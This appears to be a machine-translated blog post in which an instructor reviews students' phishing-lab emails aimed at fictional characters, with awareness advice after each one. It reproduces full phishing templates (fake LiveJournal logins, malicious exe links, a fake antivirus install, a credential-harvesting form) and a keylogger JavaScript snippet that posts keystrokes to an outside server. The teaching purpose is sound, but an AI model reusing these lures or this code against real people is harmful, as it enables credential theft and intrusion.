Нужно отправить три письма трём выдуманным персонажам. Условия 1. Письма нужно действительно отправить на указанные почтовые ящики. Через napechata.li/form нужно выслать список адресов, с которых ушли письма. 2. Считается, что персонажи открывают письма на рабочих компьютерах в рабочее время. 3. При написании нужно использовать индивидуальные особенности персонажей, указанные в задании. По умолчанию считается, что письмо, написанное кому угодно и без деталей, не идет в зачет. 4. Цель атаки — доступ во внутреннюю сеть или к данным (почта, календари, архивы, финансовая информация) организации, в которой работает каждый из персонажей. Меньший приоритет в получении личных данных персонажей. 5. От кого, под каким предлогом и как будет совершаться атака, остаётся на ваше усмотрение. Использование доп. средств (скрипты, документы с макросами, софт) идет в зачет при наличии подходящей легенды. 6. Письма, попавшие в спам, не идут в зачёт. 7. Письмо, ссылка в котором никуда не ведёт, не идёт в зачёт. В отчете должны быть: 1. Тексты или скриншоты писем 2. Описание того, почему каждому из пользователей было отправлено письмо 3. Какую информацию планировалось получить после отправки писем 4. Какую информацию удалось получить после отправки писем 5. Список адресов, с которых отправлена почта 

New Innovation Miner

Progress without worries.
You have always wanted to touch the world of crypto currencies, but did not know where to start? Use our miner while not using the computer. Even time will work for you.
Forward.
Everything for starting in one flow http://clc.am/ \

Everything is fine in this letter - all that is missing is a normal call-to-action button. Instead, a small link at the bottom, which is still not clicked. In general, the complete failure of potential cryptogeny in the cryptographic market.

Promised buns - do not make efforts, everything works by itself, without investments. Yes of course.

Investment trade platform of a new generation

Do you need any comments here?

Photobanker from photobank

How to add a letter of solidity? Of course, use photos from photobanks. It is surprising that below in the same letter there are no smiling people in business suits.

Advertising platform

LJ does not stand still and develops. Valerie was offered to choose advertising categories - why not take advantage of such an excellent offer?

The “malefactor” tried - the link in the letter leads to the site on a free hosting, where in the LJ styles they drew a form for entering personal data and card information.

It is very easy to suspect nothing - but it is enough to check the address bar. Also, when I first opened this link and entered a fictional card, I saw this pop-up:

Warn for good reason - the site is really dangerous.

Such “sites” on free hosting do not last long and are also filled with watermarks. And on a paid hosting (and with a second-level domain), you can send a complaint about phishing and fraud. As practice shows, such sites are actively blocked - for example, our Security Service regularly sends requests to registrars when it detects any new fraudulent scheme.

Desktop application LiveJournal

The guys were not lazy and even wrote a desktop application - well, what good fellows. Even viewing publications without the Internet screwed.

The link leads to the exe file: http: //xxx.193.52.92/livejournal_desktop_1.0.3b.exe . Of course, I will not upload it.

Before installing any applications from dubious sources (and mail is a very dubious source), go to the official website and check if it is there at all. And if there is, install from there.

Browser extension

I love my students and practically do not limit their imagination. This leads to the fact that such letters come. I cite it entirely - so beautiful.

 > Здравствуйте, Валерия Валерьевна. Вам пишет команда молодых разработчиков сервиса "Your Favourite Song". Мы создаем культурную среду, в которой каждый может себе найти занятие по-вкусу! В данный момент мы разрабатываем приложение для браузера, которое является агрегатором всех культурных событий, что проходят в нашем замечательном городе! Начать мы решили с создания подборок всех бесплатных и платных концертов нашего города. Зная о Вашем увлечении музыкой из блога в ЖЖ, мы решили предоставить Вам замечательную возможность опробовать наше расширение одной из первых, и возможно, послужить благому делу и оставить у себя в ЖЖ отзыв, как только расширение перейдет из стадии закрытого бета-тестирования в открытый бета-тест. Для того чтобы установить данное расширение - перейдите по ссылке и скачайте с нашего приватного хранилища расширение, затем установите его. Инструкцию по установке мы напишем ниже. > 1. Перейдите по ссылке https://goo-gl.ru/OK и скачайте zip-архив. 2. Распакуйте zip-архив в любую удобную папку. 3. Зайдите в ваш браузер во вкладку расширения. 4. Нажмите на кнопку "добавить стороннее распакованное расширение". 5. Перейдите в папку, куда Вы распаковали наше расширение и укажите путь к папке keylogExten. 6. В течение недели мы добавим вас в нашу базу данных и удаленно активируем функционал нашего расширения. 7. Наслаждайтесь удобным сервисом! > С уважением, команда "Your Favourite Song". 

Here the approach is more radical than what was sent this year. Under the link - the shortcut, which redirects to the cloud storage. There is a browser keylogger, packed in two archives. It has a simple event listener that runs on jquery, listens for keydown events, collects codes into packets and sends them to a server.

 function sendSymOnServer(page, data) { var xhr = new XMLHttpRequest(); var body = 'page = ' + encodeURIComponent(page) + '&data = ' + encodeURIComponent(data); xhr.open("POST", 'https://requestb.in/1fa7izj1', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(body); } 

Naturally, never install extra extensions - especially those in the description of which is the word keylog.

Write, cut

Like last year, it was not without ingenious copywriting. While I was writing this article, it turned out that someone else was a copywriter, and the student took the text from the Internet.

At this point, all contextual banner ads show me all about lucid dreaming. And it seems to you, too. Do not thank.

Fan letters

As for me, the most dangerous type of phishing. The attacker explored the situation and hit the sore spots - all can be difficult to cope with praise, flattery, recognition, and not begin to respond to the fraudster.

Here is an example:

Good evening, Valeria.
I apologize for the trouble, My name is Dmitry, and first of all I want to thank you for your warm posts in the magazine.
Probably, I would have remained a silent reader, inspired by your example, but your yesterday’s dream does not go out of my head.
He reminded me of the work of a talented visionary artist by the name of Freudun Rassouli, and to a greater extent his picture "Journey Home."
As in you, the theme of cosmic unity is close to this artist: he was convinced that any creation is a product of the synchronization of our energies with the Universe.
I thought that it would be interesting for you to become more familiar with his work, so I picked up the most sophisticated and deepest of his works.
Unfortunately, I can not attach them all at once, but I can offer you an archive with my own selection.
https://cloud.mail.ru/public/Bg6E/WKr64w
I am sure you will find among these amazing pictures a lot of similarities with your dreams. And, it seems to me, they will look great in your blog.
Best wishes,
Your regular reader.

The link is the file Pictures.exe, in which, of course, there are no pictures, but there is a keylogger.

And another fan:

 > Здравствуйте, Валерия Валерьевна. > Меня зовут Дмитрий, можно просто Дима. > Я немного следил за вами на ЖЖ. У вас весьма удивительные сны. Вы же ведь знаете, что каждый сон может что-то значить? Я немного в этом разбираюсь и даже иногда веду записи о толковании снов в своем ЖЖ. Мне бы очень хотелось поделиться ими с вами. А также побольше пообщаться с вами. К вам можно обращаться на "ты"? С нетерпением жду ваших высказываний по поводу моих мыслей. > С уважением, > Ушков Дмитрий. 

Under the link is another form of authorization in LiveJournal on free hosting (to the point - livejjournal). There are https, so browsers do not swear, but you still need to look carefully.

Contest of unknown rap artists

I appeal first of all to the unknown rap artists who came to this page to participate in the competition.

Yo, guys, never react to such letters, it makes no sense.

 > Здравствуйте Хусанбой! > Вас беспокоит тех.поддержка сайта молодых исполнителей хип-хоп музыки. За Вашей учетной записью была замечена подозрительная активность, поэтому Ваш аккаунт был заблокирован. Для восстановления доступа к аккаунту и участия в последующем конкурсе неизвестных исполнителей с призом в 6 млн.рублей Вам следует подтвердить свою учетную запись и предоставить данные для участия в конкурсе в форме ниже. Все введенные Вами данные будут тщательно проверяться для осуществления безопасности конкурса и его справедливого проведения. Также должны Вас предупредить о том, что до окончания конкурса изменение и восстановление логина/пароля и личной информации в учетной записи невозможно, поэтому для логина/пароля вводите то, что Вы точно не забудете или вводите ежедневно, а информацию о себе только верную. 

If you were able to finish reading this text, without ever skipping your eyes, tell us what is there. The link after the letter leads to a Google-form of 30 fields (Trojan elephant!), The most notable of which are:

• Login: Password.
• Programs that were used when creating (recording) a track *.
• E-mail / links in social networks of employees who might be interested in the direction of hip-hop *.
• FULL NAME. employees who might be interested in hip-hop *.

Never enter on unfamiliar sites the names of employees who might be interested in hip-hop.

Antivirus Sotvondiev

Good day!
In connection with the tightening of the personal data processing policy in our taxis, all employees need to use a certified security tool.
In our company, Kaspersky Endpioint Security was selected as such an agent, having certificates of conformity of the FSB SF / 019-3471 and FSTEC No. 3025.
Download the installation files of this tool at the following link:
http://aes.s.kaspersky-labs.com/endpoints/keswin11/11.0.1.90/english-2778/bb0e36ac/keswin_11.0.1.90_ru_aes256.exe
The employees are requested to download and install Kaspersky Endpoint Security themselves. At the end of the month, during the scheduled inspection, the facility will be activated by the specialists of our department.
Department of technical safety taxi "Timoshinsky".

As well, that fraudsters feel free to use spell checkers. It helps to identify heresy in the inbox and erase it without reading it out. Naturally, the link does not lead there - although also to the executable.

Unknown rap artists and where they live

Rather, click the link, look, and there ...

This team of students decided to designate how to catch a person in phishing. This is not without meaning - it is important to understand the mechanics of the process, so I counted the lab with them, although not without hesitation.

I repeat once again - do not enter any data on bank cards on unverified sites.

Shooting in a rapper clip

I go, determined to play in the clip, and there:

> Error: This account has been suspended.

Details about the account owner:
Name: Phishing Detected
Username:
Email: rap.ruXXXX@gmail.com

As you can see, services are struggling with phishing before I told you about it on Habré. Therefore, I only learned about what was on the site from the report. Some other time I will talk about how I accept reports - this is a separate big story.

Hysterical test drive

Kia Center St. Petersburg reports that you have a unique chance to rent a brand new Kia Quoris car. This is a completely new business-class model, with a completely new engine and a redesigned Podoveski and transmission system. And most importantly, you get an unprecedented opportunity to get this car for the whole MONTH !!! For personal use !!! Drive it in the city, try long trips, evaluate the quality and reliability of our new car!

Even in the letter there was a beautiful picture with this car and a link to the online form for receiving different information.

The student also used the information that the character drives a friend’s car, and fueled the interest of the potential victim by the fact that there were only 3 cars left. In general, it's time to run-rush and sign up for a free test drive.

And it is better to remember that there is nothing free on the Internet, and not to be sent to dubious letters.